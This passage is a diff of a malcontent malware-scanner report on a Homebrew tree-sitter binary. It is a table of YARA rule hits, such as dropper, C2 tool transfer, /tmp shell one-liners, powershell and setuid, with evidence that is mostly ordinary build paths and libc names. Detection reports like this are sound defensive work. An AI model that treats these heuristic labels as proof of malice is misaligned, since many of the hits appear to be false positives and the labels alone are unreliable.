[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/col](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fcol&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/raw](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fraw&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/str](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fstr&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/syn](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fsyn&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/vec](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fvec&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/cell](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fcell&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/esca](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fesca&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/io/b](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fio%2Fb&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/num/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fnum%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/ops/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fops%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/slic](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fslic&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/str/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fstr%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/time](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Ftime&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/mo](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fmo&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/st](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fst&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/os/fd](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fos%2Ffd&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sync/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsync%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/p](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fp&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/threa](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fthrea&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/addr2line-0.22](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Faddr2line-0.22&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/gimli-0.29.0/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fgimli-0.29.0%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/hashbrown-0.14](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fhashbrown-0.14&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/miniz_oxide-0.](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fminiz_oxide-0.&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/rustc-demangle](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Frustc-demangle&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/config/s](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fconfig%2Fs&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/generate](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fgenerate&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/src/high](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fsrc%2Fhigh&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/highlight/sr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fhighlight%2Fsr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/binding_](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fbinding_&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/././](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2F.%2F&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./ge](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fge&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./la](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fla&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./pa](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fpa&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./qu](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fqu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./st](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fst&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./su](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fsu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./tr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Ftr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/tags/src/lib](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Ftags%2Fsrc%2Flib&type=code) | -| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | -| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | -| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | -| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| LOW | 
[fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | -| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | -| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | -| LOW | [net/http/2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop](https://bitbucket.org/grammar.js.gitignore.gitattributes.editorconfigcgop)
[https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi](https://cdnjs.cloudflare.com/ajax/libs/clusterize.js/0.18.0/clusterize.mi)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.c)
[https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j](https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.45.0/codemirror.min.j)
[https://code.jquery.com/jquery-3.3.1.min.js](https://code.jquery.com/jquery-3.3.1.min.js)
[https://docs.rs/getrandom](https://docs.rs/getrandom)
[https://docs.rs/tree-sitter-language/](https://docs.rs/tree-sitter-language/)
[https://docs.rs/tree-sitter/](https://docs.rs/tree-sitter/)
[https://github.com/ChimeHQ/SwiftTreeSitter](https://github.com/ChimeHQ/SwiftTreeSitter)
[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers) | -| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) | -| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) | -| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | -| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [Uses glibc thread local storage](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | -| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | 
+|--------|-----------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| HIGH 
| [exec/shell/tmp_semicolon](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/tmp_semicolon.yara#semicolon_short_tmp) | unusual one-liners involving /tmp | [--;/tmp/rust-20241004-6494-uljaw4/rustc-1](https://github.com/search?q=--%3B%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1&type=code) |
+| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) |
+| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) |
+| MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) |
+| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
+| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) |
+| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) |
+| MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | powershell | [powershell](https://github.com/search?q=powershell&type=code) |
+| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) |
+| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/col](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fcol&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/raw](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fraw&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/str](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fstr&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/syn](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fsyn&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/vec](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fvec&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/cell](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fcell&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/esca](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fesca&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/io/b](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fio%2Fb&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/num/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fnum%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/ops/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fops%2F&type=code)
